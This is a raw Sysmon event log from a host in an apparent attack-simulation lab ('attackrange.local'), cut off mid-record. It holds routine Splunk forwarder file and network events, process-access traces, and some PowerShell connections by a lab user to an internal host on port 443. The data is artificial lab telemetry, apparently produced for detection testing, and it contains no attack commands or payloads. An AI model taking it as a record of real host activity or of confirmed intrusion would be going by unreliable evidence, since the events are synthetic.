15:06:05.726{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8F72B5AE756CAF3DFFCAE4F1D88B5AA,SHA256=168562221AB963472CE7802BBBD3C107E4CDB1C9102A105454C2052B2F0BCD32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:05.058{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=31A681B819BD3D173CB2FD182E79B24E,SHA256=A8AA404DBD138EC1DD8F8855A0A3E70227E57835E84BFD4386DAD587AD200CF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:05.058{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D55F1BE350749BC65540B977C0A4A4B,SHA256=1FC6EFD39BF13DAF436BBE6C403B51057A25571C75A69419AD0F08EAEA62A4EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:06.741{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCF2969029E49EE28E52CCC42C964211,SHA256=3A7E52B9A3E313B462D64F2F32B91FD548B0397FE0B1D0321B8C00D7E1E204BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:33.162{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52583-false10.0.1.12-8000- 23542300x800000000000000035343704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:07.756{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAAD5B30C2A3821F2258A7D0599DFDA7,SHA256=9A368936411BE12BBC042B85171AA781C817FD419E69679DAE012BE89F9DC7A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:08.808{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=026F3BEE15E063510908637222FE6666,SHA256=6F50672022C96ED731BEDF7DE02B81FBA4EA48A9570DC78C84D2D720F91EFE15,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:08.458{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=475B2A68BD5EB751789A91770907805A,SHA256=D2F31E2B506CA0955C03F5BDA00656FA9DFD945318ABC327E109BC7EC34BB4FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:34.379{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52584-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:09.857{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BB12FA2838776A76CF3A385112BF7F2,SHA256=32E909F6BC48FDDDF09D7FBE612AAD5209E28A4CA0DB4AA691FE92A5DE517EA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:10.871{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=418B0B506DAF1FF4566923EB497D9DED,SHA256=0FBF9DF165250387DF2E0D6495E77A1382DFA7F268303EAD903115A7B49DF589,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:11.903{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=226D324C3E52922612C2074F014B05EE,SHA256=D9CB9793488D95A21F59898F3F975B16158C6118979E2C90CA8A1080A4A82DDA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:12.922{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35DBDAFF9AEAED31343E9FC23079DFA9,SHA256=847B0053FEC2A5D9AE2D8B98D95598DB96C16953BF9A41D6EC6B610DB1243E6B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:13.937{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B5A2CE60BBAC7F1EA271C2F419E8320,SHA256=227EFED06207E6ED2204A7CAE5E12E789E1B6B7529007B88AF1BCDEF459C00D9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:38.208{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52585-false10.0.1.12-8000- 23542300x800000000000000035343716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:14.952{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A435677A90EBE9329C32DAF8FDB11CB,SHA256=92B7D6661A41490205C192A9D4E6603A893C6239C88F250FCE27FDF1A79810CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:14.636{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C024994EA05C00CF224DACDF423B8164,SHA256=4BAB6E7A6B60C3F66034EE8CF5DF61B6EF74374EF2856982AA868A458CF7B3CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:15.982{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78CCF609C73FB64BA92389CAC1DA2B4A,SHA256=0E3DAD4B30B99709A66C0D9FD7E4F084818520B9D234C6DDCF74478A3C20182E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:40.406{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52586-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:16.998{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67D4179AC79EBF5B10F629339D6399B6,SHA256=8BBCE8AC0CCAF50604919EA6034BFE3017981BD796090AF34D090D5A1DCEBA3E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:17.299{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7469-613B-66B4-03000000C801}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:17.297{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:17.297{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:17.297{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:17.297{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:17.297{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7469-613B-66B4-03000000C801}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:17.297{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7469-613B-66B4-03000000C801}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:17.281{B81B27B7-7469-613B-66B4-03000000C801}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:18.317{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=187A746BA10C77CCE25303C596B0DC85,SHA256=CB649CBDEB47B5A0A4E52B2ACE4D0C3129BA418C0814E4D94F9A809F3D2BF934,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:18.317{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=31A681B819BD3D173CB2FD182E79B24E,SHA256=A8AA404DBD138EC1DD8F8855A0A3E70227E57835E84BFD4386DAD587AD200CF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:43.240{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52587-false10.0.1.12-8000- 10341000x800000000000000035343737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:18.180{B81B27B7-7469-613B-67B4-03000000C801}46605840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035343736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:18.017{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ECD9BF874EF66C64FCC125DE5A13BEA,SHA256=B949899B231E4B7EC092590B80B596E7675BD405DBCEF38CAB2F339600C6B2C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:18.002{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7469-613B-67B4-03000000C801}4660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:18.002{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:18.002{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:18.002{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:18.002{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7469-613B-67B4-03000000C801}4660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:18.002{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:18.002{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7469-613B-67B4-03000000C801}4660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program 